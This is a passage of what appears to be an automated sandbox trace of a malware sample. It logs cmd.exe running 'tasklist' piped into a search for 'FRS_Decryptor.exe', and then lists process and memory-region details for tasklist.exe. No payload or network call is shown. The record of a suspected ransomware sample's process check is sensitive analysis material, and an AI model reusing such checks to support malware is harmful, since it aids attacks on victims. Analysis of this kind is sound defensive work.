[0080.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.675] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0080.676] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0080.676] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0080.677] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x8bf970*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8bf9bc | out: lpCommandLine="tasklist", lpProcessInformation=0x8bf9bc*(hProcess=0x64, hThread=0x60, dwProcessId=0xb9c, dwThreadId=0xb98)) returned 1 [0080.681] CloseHandle (hObject=0x60) returned 1 [0080.681] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0080.681] GetEnvironmentStringsW () returned 0xaf42d8* [0080.681] FreeEnvironmentStringsA (penv="=") returned 1 [0080.681] DeleteProcThreadAttributeList (in: lpAttributeList=0x8bf9e8 | out: lpAttributeList=0x8bf9e8) [0080.681] _get_osfhandle (_FileHandle=3) returned 0x54 [0080.681] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0080.681] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0080.681] _close (_FileHandle=5) returned 0 [0080.681] _dup (_FileHandle=0) returned 4 [0080.681] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0080.681] _close (_FileHandle=3) returned 0 [0080.682] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0080.682] SetErrorMode (uMode=0x0) returned 0x0 [0080.682] SetErrorMode (uMode=0x1) returned 0x0 [0080.682] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaf42e0, lpFilePart=0x8bfa8c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x8bfa8c*="Desktop") returned 0x1c [0080.682] SetErrorMode (uMode=0x0) returned 0x1 [0080.682] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0080.682] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0080.682] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.682] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xffffffff [0080.682] GetLastError () returned 0x2 [0080.682] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xaf5628 [0080.683] FindClose (in: hFindFile=0xaf5628 | out: hFindFile=0xaf5628) returned 1 [0080.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xffffffff [0080.683] GetLastError () returned 0x2 [0080.683] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x8bf818, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf818) returned 0xaf5628 [0080.683] FindClose (in: hFindFile=0xaf5628 | out: hFindFile=0xaf5628) returned 1 [0080.683] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0080.683] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0080.683] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0080.683] SetErrorMode (uMode=0x0) returned 0x0 [0080.683] SetErrorMode (uMode=0x1) returned 0x0 [0080.684] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaf4668, lpFilePart=0x8bf834 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x8bf834*="Desktop") returned 0x1c [0080.684] SetErrorMode (uMode=0x0) returned 0x1 [0080.684] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0080.684] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0080.684] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0080.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.684] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xffffffff [0080.684] GetLastError () returned 0x2 [0080.684] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0080.684] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xaf04a0 [0080.685] FindClose (in: hFindFile=0xaf04a0 | out: hFindFile=0xaf04a0) returned 1 [0080.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xffffffff [0080.685] GetLastError () returned 0x2 [0080.685] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x8bf5c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x8bf5c0) returned 0xaf04a0 [0080.685] FindClose (in: hFindFile=0xaf04a0 | out: hFindFile=0xaf04a0) returned 1 [0080.685] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0080.685] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0080.685] GetConsoleTitleW (in: lpConsoleTitle=0x8bfabc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0080.685] InitializeProcThreadAttributeList (in: lpAttributeList=0x8bf9e8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x8bf9cc | out: lpAttributeList=0x8bf9e8, lpSize=0x8bf9cc) returned 1 [0080.685] UpdateProcThreadAttribute (in: lpAttributeList=0x8bf9e8, dwFlags=0x0, Attribute=0x60001, lpValue=0x8bf9d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x8bf9e8, lpPreviousValue=0x0) returned 1 [0080.686] GetStartupInfoW (in: lpStartupInfo=0x8bfa20 | out: lpStartupInfo=0x8bfa20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x34c, hStdError=0x2c)) [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0080.686] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0080.687] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0080.687] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0080.687] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x8bf970*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x8bf9bc | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x8bf9bc*(hProcess=0x60, hThread=0x54, dwProcessId=0xba4, dwThreadId=0xba0)) returned 1 [0080.690] CloseHandle (hObject=0x54) returned 1 [0080.690] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0080.690] GetEnvironmentStringsW () returned 0xafad78* [0080.691] FreeEnvironmentStringsA (penv="=") returned 1 [0080.691] DeleteProcThreadAttributeList (in: lpAttributeList=0x8bf9e8 | out: lpAttributeList=0x8bf9e8) [0080.691] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0080.691] _close (_FileHandle=4) returned 0 [0080.691] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0 [0081.157] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x8bfd30 | out: lpExitCode=0x8bfd30*=0x0) returned 1 [0081.157] CloseHandle (hObject=0x64) returned 1 [0081.157] WaitForSingleObject (hHandle=0x60, dwMilliseconds=0xffffffff) returned 0x0 [0081.159] GetExitCodeProcess (in: hProcess=0x60, lpExitCode=0x8bfd30 | out: lpExitCode=0x8bfd30*=0x0) returned 1 [0081.159] CloseHandle (hObject=0x60) returned 1 [0081.159] _get_osfhandle (_FileHandle=1) returned 0x34c [0081.159] SetConsoleMode (hConsoleHandle=0x34c, dwMode=0x0) returned 0 [0081.159] _get_osfhandle (_FileHandle=1) returned 0x34c [0081.159] GetConsoleMode (in: hConsoleHandle=0x34c, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0081.159] _get_osfhandle (_FileHandle=0) returned 0x24 [0081.159] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0081.160] SetConsoleInputExeNameW () returned 0x1 [0081.160] GetConsoleOutputCP () returned 0x1b5 [0081.160] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0081.160] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.160] exit (_Code=0) Process: id = "63" image_name = "tasklist.exe" filename = "c:\\windows\\syswow64\\tasklist.exe" page_root = "0x11964000" os_pid = "0xb9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "62" os_parent_pid = "0xb94" cmd_line = "tasklist" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3376 start_va = 0xa0000 end_va = 0xb6fff entry_point = 0xa0000 region_type = mapped_file name = "tasklist.exe" filename = "\\Windows\\SysWOW64\\tasklist.exe" (normalized: "c:\\windows\\syswow64\\tasklist.exe") Region: id = 3377 start_va = 0x320000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 3378 start_va = 0x340000 end_va = 0x341fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 3379 start_va = 0x350000 end_va = 0x35efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 3380 start_va = 0x360000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 3381 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 3382 start_va = 0x3e0000 end_va = 0x3e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 3383 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 3384 start_va = 0x400000 end_va = 0x401fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3385 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3386 start_va = 0x7e5c0000 end_va = 0x7e5e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e5c0000" filename = "" Region: id = 3387 start_va = 0x7e5e6000 end_va = 0x7e5e6fff entry_point = 0x0 region_type = private name = "private_0x000000007e5e6000" filename = "" Region: id = 3388 start_va = 0x7e5e7000 end_va = 0x7e5e7fff entry_point = 0x0 region_type = private name = "private_0x000000007e5e7000" filename = "" Region: id = 3389 start_va = 0x7e5ed000 end_va = 0x7e5effff entry_point = 0x0 region_type = private name = "private_0x000000007e5ed000" filename = "" Region: id = 3390 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3391 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3392 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3393 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3413 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 3414 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3415 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3416 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3421 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 3422 start_va = 0x330000 end_va = 0x333fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 3423 start_va = 0x340000 end_va = 0x342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 3424 start_va = 0x410000 end_va = 0x48dfff entry_point = 0x410000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3425 start_va = 0x490000 end_va = 0x490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 3426 start_va = 0x4a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 3427 start_va = 0x4b0000 end_va = 0x4b0fff entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3428 start_va = 0x4c0000 end_va = 0x4c3fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 3429 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 3430 start_va = 0x4e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 3431 start_va = 0x4f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 3432 start_va = 0x6a0000 end_va = 0x79ffff entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 3433 start_va = 0x7a0000 end_va = 0x927fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 3434 start_va = 0x930000 end_va = 0xab0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 3435 start_va = 0xac0000 end_va = 0x1ebffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3436 start_va = 0x1ec0000 end_va = 0x2001fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 3437 start_va = 0x2010000 end_va = 0x22e4fff entry_point = 0x2010000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3438 start_va = 0x22f0000 end_va = 0x26ebfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 3439 start_va = 0x73480000 end_va = 0x734e0fff entry_point = 0x73480000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3440 start_va = 0x734f0000 end_va = 0x734fbfff entry_point = 0x734f0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3441 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3442 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3443 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3444 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3445 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3446 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3447 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3448 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3449 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3450 start_va = 0x745f0000 